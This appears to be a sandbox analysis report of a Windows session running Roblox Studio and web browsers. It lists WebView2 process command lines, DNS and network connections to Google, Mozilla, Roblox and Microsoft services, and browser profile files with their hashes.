"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1620,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:3

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1180,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3220,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3808,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3232,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
IE 52.111.236.23:443 tcp
N/A 127.0.0.1:49882 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 52.25.243.81:443 shavar.prod.mozaws.net tcp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 81.243.25.52.in-addr.arpa udp
N/A 127.0.0.1:49888 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.206:443 apis.google.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 216.58.213.14:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.200.46:443 play.google.com udp
GB 216.58.213.14:443 clients2.google.com udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.213.14:443 consent.google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 id.google.com udp
GB 142.250.178.3:443 id.google.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.roblox.com udp
GB 128.116.119.4:443 www.roblox.com tcp
GB 128.116.119.4:443 www.roblox.com tcp
US 8.8.8.8:53 css.rbxcdn.com udp
US 8.8.8.8:53 static.rbxcdn.com udp
US 8.8.8.8:53 js.rbxcdn.com udp
GB 216.137.44.38:443 css.rbxcdn.com tcp
GB 216.137.44.38:443 css.rbxcdn.com tcp
GB 216.137.44.38:443 css.rbxcdn.com tcp
GB 216.137.44.38:443 css.rbxcdn.com tcp
GB 216.137.44.38:443 css.rbxcdn.com tcp
GB 216.137.44.38:443 css.rbxcdn.com tcp
GB 108.138.217.67:443 static.rbxcdn.com tcp
US 2.19.252.155:443 js.rbxcdn.com tcp
US 2.19.252.155:443 js.rbxcdn.com tcp
US 2.19.252.155:443 js.rbxcdn.com tcp
US 2.19.252.155:443 js.rbxcdn.com tcp
US 2.19.252.155:443 js.rbxcdn.com tcp
US 2.19.252.155:443 js.rbxcdn.com tcp
US 8.8.8.8:53 roblox.com udp
US 8.8.8.8:53 images.rbxcdn.com udp
US 8.8.8.8:53 ecsv2.roblox.com udp
GB 216.137.44.24:443 images.rbxcdn.com tcp
US 8.8.8.8:53 metrics.roblox.com udp
US 8.8.8.8:53 4.119.116.128.in-addr.arpa udp
US 8.8.8.8:53 38.44.137.216.in-addr.arpa udp
US 8.8.8.8:53 155.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 61.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 24.44.137.216.in-addr.arpa udp
US 8.8.8.8:53 apis.roblox.com udp
GB 128.116.119.4:443 apis.roblox.com tcp
US 8.8.8.8:53 apis.rbxcdn.com udp
BE 23.14.90.81:443 apis.rbxcdn.com tcp
GB 216.137.44.38:443 css.rbxcdn.com tcp
GB 128.116.119.4:443 apis.roblox.com udp
US 8.8.8.8:53 81.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 setup.rbxcdn.com udp
GB 13.224.245.62:443 setup.rbxcdn.com tcp
US 8.8.8.8:53 62.245.224.13.in-addr.arpa udp
N/A 127.0.0.1:50666 tcp
US 8.8.8.8:53 client-telemetry.roblox.com udp
GB 128.116.119.3:443 client-telemetry.roblox.com tcp
US 8.8.8.8:53 3.119.116.128.in-addr.arpa udp
N/A 127.0.0.1:50670 tcp
US 8.8.8.8:53 ecsv2.roblox.com udp
GB 128.116.119.4:443 ecsv2.roblox.com tcp
US 8.8.8.8:53 clientsettingscdn.roblox.com udp
GB 18.165.242.53:443 clientsettingscdn.roblox.com tcp
US 8.8.8.8:53 setup.rbxcdn.com udp
US 2.19.252.160:443 setup.rbxcdn.com tcp
US 8.8.8.8:53 53.242.165.18.in-addr.arpa udp
N/A 127.0.0.1:50673 tcp
US 8.8.8.8:53 160.252.19.2.in-addr.arpa udp
N/A 127.0.0.1:50676 tcp
US 2.19.252.160:443 setup.rbxcdn.com tcp
US 2.19.252.160:443 setup.rbxcdn.com tcp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 msedge.api.cdp.microsoft.com udp
US 23.102.129.60:443 msedge.api.cdp.microsoft.com tcp
US 8.8.8.8:53 60.129.102.23.in-addr.arpa udp
US 8.8.8.8:53 msedge.f.tlu.dl.delivery.mp.microsoft.com udp
GB 217.20.56.43:80 msedge.f.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
GB 128.116.119.4:443 ecsv2.roblox.com udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
GB 128.116.119.3:443 client-telemetry.roblox.com tcp
N/A 127.0.0.1:51162 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.3:443 id.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
MX 142.250.68.227:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 227.68.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 www.roblox.com udp
US 8.8.8.8:53 js.rbxcdn.com udp
US 8.8.8.8:53 static.rbxcdn.com udp
GB 128.116.119.4:443 www.roblox.com udp
US 8.8.8.8:53 css.rbxcdn.com udp
GB 18.245.253.65:443 js.rbxcdn.com tcp
GB 108.138.217.67:443 static.rbxcdn.com tcp
GB 216.137.44.23:443 css.rbxcdn.com tcp
GB 128.116.119.4:443 www.roblox.com tcp
US 8.8.8.8:53 23.44.137.216.in-addr.arpa udp
US 8.8.8.8:53 65.253.245.18.in-addr.arpa udp
US 8.8.8.8:53 roblox-api.arkoselabs.com udp
US 8.8.8.8:53 images.rbxcdn.com udp
GB 18.244.155.10:443 roblox-api.arkoselabs.com tcp
BE 23.14.90.89:443 images.rbxcdn.com tcp
GB 128.116.119.4:443 www.roblox.com udp
GB 128.116.119.4:443 www.roblox.com tcp
US 8.8.8.8:53 apis.rbxcdn.com udp
GB 18.244.155.10:443 roblox-api.arkoselabs.com udp
BE 23.14.90.81:443 apis.rbxcdn.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
GB 216.137.44.23:443 css.rbxcdn.com tcp
US 8.8.8.8:53 10.155.244.18.in-addr.arpa udp
US 8.8.8.8:53 89.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 locale.roblox.com udp
US 8.8.8.8:53 auth.roblox.com udp
US 8.8.8.8:53 ncs.roblox.com udp
GB 128.116.119.4:443 ncs.roblox.com udp
US 8.8.8.8:53 ecsv2.roblox.com udp
GB 128.116.119.4:443 ecsv2.roblox.com udp
US 8.8.8.8:53 msedge.api.cdp.microsoft.com udp
NL 13.95.26.4:443 msedge.api.cdp.microsoft.com tcp
US 8.8.8.8:53 4.26.95.13.in-addr.arpa udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 2.20.12.74:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 74.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 client-telemetry.roblox.com udp
GB 128.116.119.3:443 client-telemetry.roblox.com tcp
US 8.8.8.8:53 ecsv2.roblox.com udp
GB 128.116.119.4:443 ecsv2.roblox.com tcp
GB 128.116.119.3:443 client-telemetry.roblox.com tcp
GB 128.116.119.4:443 ecsv2.roblox.com tcp
N/A 127.0.0.1:52106 tcp
N/A 127.0.0.1:52109 tcp
N/A 127.0.0.1:52114 tcp
N/A 127.0.0.1:52117 tcp
US 8.8.8.8:53 clientsettingscdn.roblox.com udp
BE 104.68.69.233:443 clientsettingscdn.roblox.com tcp
US 8.8.8.8:53 setup.rbxcdn.com udp
GB 13.224.245.62:443 setup.rbxcdn.com tcp
GB 13.224.245.62:443 setup.rbxcdn.com tcp
GB 13.224.245.62:443 setup.rbxcdn.com tcp
US 8.8.8.8:53 233.69.68.104.in-addr.arpa udp
N/A 127.0.0.1:52120 tcp
N/A 127.0.0.1:52124 tcp
US 8.8.8.8:53 clientsettingscdn.roblox.com udp
GB 18.165.242.41:443 clientsettingscdn.roblox.com tcp
N/A 127.0.0.1:52216 tcp
N/A 127.0.0.1:52226 tcp
GB 128.116.119.4:443 ecsv2.roblox.com tcp
US 8.8.8.8:53 apis.roblox.com udp
GB 128.116.119.4:443 apis.roblox.com tcp
US 8.8.8.8:53 41.242.165.18.in-addr.arpa udp
US 8.8.8.8:53 ephemeralcounters.api.roblox.com udp
GB 128.116.119.4:443 ephemeralcounters.api.roblox.com tcp
N/A 127.0.0.1:52231 tcp
N/A 127.0.0.1:52235 tcp
US 8.8.8.8:53 apis.roblox.com udp
US 8.8.8.8:53 apis.roblox.com udp
US 8.8.8.8:53 apis.roblox.com udp
GB 128.116.119.4:443 apis.roblox.com tcp
GB 128.116.119.4:443 apis.roblox.com tcp
US 8.8.8.8:53 46.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 www.roblox.com udp
US 8.8.8.8:53 www.roblox.com udp
US 8.8.8.8:53 www.roblox.com udp
US 8.8.8.8:53 css.rbxcdn.com udp
US 8.8.8.8:53 css.rbxcdn.com udp
US 8.8.8.8:53 static.rbxcdn.com udp
US 8.8.8.8:53 static.rbxcdn.com udp
US 8.8.8.8:53 js.rbxcdn.com udp
US 8.8.8.8:53 js.rbxcdn.com udp
US 8.8.8.8:53 images.rbxcdn.com udp
US 8.8.8.8:53 images.rbxcdn.com udp
GB 216.137.44.2:443 css.rbxcdn.com tcp
GB 216.137.44.2:443 css.rbxcdn.com tcp
GB 216.137.44.2:443 css.rbxcdn.com tcp
GB 216.137.44.2:443 css.rbxcdn.com tcp
GB 216.137.44.2:443 css.rbxcdn.com tcp
GB 216.137.44.2:443 css.rbxcdn.com tcp
GB 18.245.253.103:443 js.rbxcdn.com tcp
GB 18.245.253.103:443 js.rbxcdn.com tcp
GB 18.245.253.103:443 js.rbxcdn.com tcp
GB 18.245.253.103:443 js.rbxcdn.com tcp
GB 18.245.253.103:443 js.rbxcdn.com tcp
GB 18.245.253.103:443 js.rbxcdn.com tcp
GB 108.138.217.124:443 static.rbxcdn.com tcp
GB 108.138.217.124:443 static.rbxcdn.com tcp
GB 216.137.44.124:443 images.rbxcdn.com tcp
US 8.8.8.8:53 roblox.com udp
US 8.8.8.8:53 roblox.com udp
US 8.8.8.8:53 roblox-api.arkoselabs.com udp
US 8.8.8.8:53 roblox-api.arkoselabs.com udp
GB 216.137.44.2:443 css.rbxcdn.com tcp
US 8.8.8.8:53 metrics.roblox.com udp
US 8.8.8.8:53 metrics.roblox.com udp
GB 18.244.155.10:443 roblox-api.arkoselabs.com tcp
GB 128.116.119.4:443 metrics.roblox.com udp
GB 128.116.119.4:443 metrics.roblox.com tcp
GB 18.244.155.10:443 roblox-api.arkoselabs.com udp
US 8.8.8.8:53 2.44.137.216.in-addr.arpa udp
US 8.8.8.8:53 103.253.245.18.in-addr.arpa udp
US 8.8.8.8:53 124.217.138.108.in-addr.arpa udp
US 8.8.8.8:53 ncs.roblox.com udp
US 8.8.8.8:53 ncs.roblox.com udp
US 8.8.8.8:53 124.44.137.216.in-addr.arpa udp
US 8.8.8.8:53 apis.rbxcdn.com udp
US 8.8.8.8:53 apis.rbxcdn.com udp
BE 23.14.90.81:443 apis.rbxcdn.com tcp
US 8.8.8.8:53 auth.roblox.com udp
US 8.8.8.8:53 auth.roblox.com udp
GB 128.116.119.4:443 auth.roblox.com udp
US 8.8.8.8:53 ecsv2.roblox.com udp
US 8.8.8.8:53 ecsv2.roblox.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp

Files

memory/3472-0-0x0000017666820000-0x0000017666830000-memory.dmp

memory/3472-16-0x0000017666920000-0x0000017666930000-memory.dmp

memory/3472-35-0x0000017663DA0000-0x0000017663DA2000-memory.dmp

memory/652-47-0x0000021E8A200000-0x0000021E8A300000-memory.dmp

memory/432-52-0x00000226ABD20000-0x00000226ABE20000-memory.dmp

memory/432-55-0x00000226BCDB0000-0x00000226BCDB2000-memory.dmp

memory/432-57-0x00000226BCDD0000-0x00000226BCDD2000-memory.dmp

memory/432-65-0x00000226BCF50000-0x00000226BCF52000-memory.dmp

memory/432-63-0x00000226BCF30000-0x00000226BCF32000-memory.dmp

memory/432-61-0x00000226BCF10000-0x00000226BCF12000-memory.dmp

memory/432-59-0x00000226BCDF0000-0x00000226BCDF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\V28C7N3J\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFE8A849A3C70D9446.TMP

MD5 5a977b11d547429ce65a3debfe115ff8
SHA1 fe174e5161f76594b143bfd6428d5e259fb996ba
SHA256 00a0c27e9cfcd39338c28b3a80a3d41ebc73b8f47320c588823ad3e75fe61341
SHA512 369a2a2097618108dc5547bfc6a404003d5f8ff795904afe0cff85e886d089c22724124dba130ff7ae4ede0575e45d8b56a632cd56e153999621338a29478cbe

memory/3472-100-0x0000017665AF0000-0x0000017665AF2000-memory.dmp

memory/3472-103-0x0000017663DD0000-0x0000017663DD1000-memory.dmp

memory/3472-107-0x0000017663D90000-0x0000017663D91000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\db\data.safe.bin

MD5 0c6349cb49dee08def4934260e809ce8
SHA1 d8768c2ee0eea660665e32123627bbafd1c2d16d
SHA256 294398f646605cc9ed61aace3c2bd190e4f7c0c41c090d99f1738476e7a205f0
SHA512 03a97fc7c561fce52f5c87cc006220cc6590ed4cb46d189ef285c62ca0752352cec8396fc3823484437de9f298ff98c7d5365e5a6b3d053e8113a26a108ea243

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\bfef07aa-4682-4211-a32b-8e0f2c251d8d

MD5 4e8b0733ed195d8fae7c0ce7700c04ca
SHA1 eb60a6d4d81750fa0dc7abe774d42a1165e2bc0d
SHA256 0944d7240ea8f59dc48ccc2e4a4079768745d4c13df84cadfb685b7eed5fe5d6
SHA512 3ee7bdc50ede259daaf4af7e35e744a477b4c6779a8118a4acc76feb5253462fbb2f7526cc21a7b948734be5b3f554bf218584905c537a3097f87678ca3cd876

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\99e4d963-f29b-4b2f-8894-469988feca3c

MD5 a2a4aab8fe885266450cde5e469a66ac
SHA1 6782e2b78f9d03beaafa1fb6a9bb3a78776bcd20
SHA256 61aaa1fda357d90f2242e05165de9bdad49cbc68955e89eb745fa269b28f673e
SHA512 db0c9b86f8468ba12f922d944cc2bea82e1afa03a68b3557527cf2640555b61d38a0626da0efd2a57a26ceb27d32ba180305a2dc82217a53e68aea3095a02894

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 731c0e733fe1e3123d366af7c8e578ae
SHA1 9756304ea773dd9cd96e5996dc79de2ed6a9ae9c
SHA256 8f426b4be5e3440fa14d37480f018b7dc3d1a547b0e91c2fbfc6e31d9054a359
SHA512 d29e0f2356a3226f64692b390c122d4d70f09f677d9f5d086f2babaeba6574d670171edb24ff52f928871ec489680f57910e21fac1ca8ec08783a07d21b1f427

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

MD5 1e6cdbd02fba7e869e6b80cb60460bd0
SHA1 57329d737531322c58297fa2776b13c53ba699bf
SHA256 a488b2ff927ce5dcb1e750d46a3fe29b7af7937073917233e81a382a0ce0829c
SHA512 49ded7887528d894d76370ff4631c0825aefedb2fc46c69912fe598c139beaadded057e4038e4094ead5a2084b31fa64e6006f32a4f88b971a02b0de8087728a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore.jsonlz4

MD5 9de2053a65008cab509665694a9a49e8
SHA1 0be46b94c2585efa3f7d3fb885786a471ceff3aa
SHA256 9fd6495202e76ac60c2998b583eb0f322e0fa33727e19adbe2fbed59ae82e800
SHA512 661cddd88692db366c79d49495a9b18c7d62846145e810804c204e3e88e2f08f255e85e7f4edf8504e5a95dede94000c3435908d7769c58a390fd6f9c309f482

\??\pipe\crashpad_1452_SERELMHXEPGBURZF

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 9037995e4a0d0bf021bc5b39ff535b9c
SHA1 bffd4f11e858028a7a7a23418ac113da27548c37
SHA256 94321cf14288dc56a337b4cf5c51b3f559ecb192340beedca02a17a81663c874
SHA512 ef79bb1c0468347b0c7a2ad228c90cf625a449aa593888a033460d1a60d9a8913c6af1831782d447b323995a90fbebe79d542b18dff0784a8e853c2baed56143

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 37e2182608235f20601e631bb9c8f7bc
SHA1 b3377f1fbdd8ad50f6ba02dbc2dedc4a88d2e911
SHA256 ceee2bc557297b8e82dc36616d60ba95d6e9d01d4d5e8119c1d2fd33c6da6f63
SHA512 ff1b4b103769e8502b006a8fafc8153d96035549a9e2f90600f7837071d3ffd5a91f8c3d5a0ed81d3f0580939fc6523070d18b801263a2548e447c2d12156516

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b5e15e4ee1a1b881312f888d63c4b982
SHA1 8f75439e187c9e1f83d2ac18e23245efef169220
SHA256 a931440d3558ba2bb84da312d3e63aed51a2ed5e051a4e2f8a4d0979eceb804e
SHA512 2c0169b7ed4e61afd7979731866f37fd832bcaea05d3eedb9d731367f4f9bd54c9426bcd845a9ae70ac3d45c4c4c683292c8844cf7e3adf2dcb276b26143933e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 7a0df07116f1c2d7c62fb2f2d600df0b
SHA1 13bc774bfdf5071130bdc28e8569da2babfac6ac
SHA256 2833f628e92f2f5a49c5abe54b14caf73936d7ef3a05ffb6efc5683a9f73b880
SHA512 2c7c31e79f4e94537899597fdcdaf5ade3c097d3a696a41c88b8b737eaa4d43d7eafd164054b781b94b3bc33508de12ea6e19521fa73ce0e15300e596c03a1b2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 ee3f6b95c9c21863f7ee0ca6417f6e19
SHA1 7655d12fb76110d7e4b79c2ffb9d55785c0908e6
SHA256 211ab4e3e5d2fd74b22b5e9b8653e77a831310ff3fcb739fc1cdb4ddd55511af
SHA512 d5431fe7c8ad02372d058727c06cf63436baa7c2c11c16e2d5560b60c2901636f3385d5d18263acf49da722eae5e7e6648e58f439a967201731b721b97709cc8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 c64929d71f8769929406b672778db163
SHA1 9dcbf05f8029ec6263ec43b6958a54626adb62d1
SHA256 b8d3e55babd999d4d2ada4cdae8d09b2b34321266395960c07ec811d08b91a0a
SHA512 9ce6eaea812713c9dc9de55875f5899b21b34e2fd09666590f0a4b3a4c6b3dcce382c5c1e73e01f4066c4b99024cda816ddb324701deabf2756c76e6f5977332

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

MD5 bc6142469cd7dadf107be9ad87ea4753
SHA1 72a9aa05003fab742b0e4dc4c5d9eda6b9f7565c
SHA256 b26da4f8c7e283aa74386da0229d66af14a37986b8ca828e054fc932f68dd557
SHA512 47d1a67a16f5dc6d50556c5296e65918f0a2fcad0e8cee5795b100fe8cd89eaf5e1fd67691e8a57af3677883a5d8f104723b1901d11845b286474c8ac56f6182

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 9eae63c7a967fc314dd311d9f46a45b7
SHA1 caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf
SHA256 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d
SHA512 bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

MD5 9079226d2b1b999d16a7e7ea4b7136e9
SHA1 5d85b3c13516105cafc722d320c6ecd30a414a61
SHA256 b7064b22366097213c47a7b7f758378d927025442eff43b7dcfcbb0988a5f30b
SHA512 e6ae8772a7b8ce3cafba9e36bab93283589c49aa2ef6d7363de58f7d263c72d96f1f14440eff9be0ffb4829829a04deb8b4e491b9136efa05eff65202b17aa7e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

MD5 fb1c3d1afa30eeefe9078f3818908964
SHA1 a1ff781a8e73f1b260aaccf18e25628065c9550b
SHA256 00b5d8d7b879024a6ea1e3ea40d831af7b595635ff36ba2e6a9f6d24569e743f
SHA512 6fa1041b6f7ab5a038357acacb27c96ff221d91a2433252926b0e3d0d2c6f48ea61138c1c742e79c1b2c3676f1aadf488252e115a8260c54ca97fb954e4ee3b5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

MD5 eafce25a70661859bb96c7837975fce1
SHA1 2755175a36088745d92735eebe6825bdd27ebd23
SHA256 f08e5d33898d8c802c503f311a3142d6b5c09d357cec99a58021bdf1fb41cba0
